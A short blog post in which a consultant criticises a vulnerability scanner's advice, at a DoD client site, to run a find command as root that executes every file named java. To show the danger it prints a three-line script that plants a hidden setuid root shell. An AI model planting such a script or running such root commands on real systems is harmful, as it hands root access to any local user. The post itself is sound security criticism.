One of my long term clients is a DoD software development program. In recent years DoD has been taking computer security, aka “information assurance” fairly seriously. Software updates, system configurations, and vulnerability scanning are mandated with ever increasing specificity and urgency.
All well and good, and the general trend has definitely been for the better overall. But, whenever a big bureaucracy is involved you can be sure to find some counterproductive forces.
A recent case in point: at my client site frequent vulnerability scanning with specific products is mandated. The reports generated by this product often include very detailed prescriptive “mitigations”. The instructions for a java related vulnerability on Linux/Unix included this (paraphrased) gem:
As root, execute the following commands on these systems to determine if any
vulnerable versions of java are present:
find / -name java -exec {} -v {} \;
Wow. I wonder how many sysadmins will actually run that command on their systems. If you don’t immediately see the clear and present danger in this instruction consider the following shell script located in, say, the /tmp/ directory:
#!/bin/sh
cp /bin/sh /usr/lib/security/.x
chmod u+s /usr/lib/security/.x
Bingo, an instant root privilege backdoor for anyone with any shell access to that system.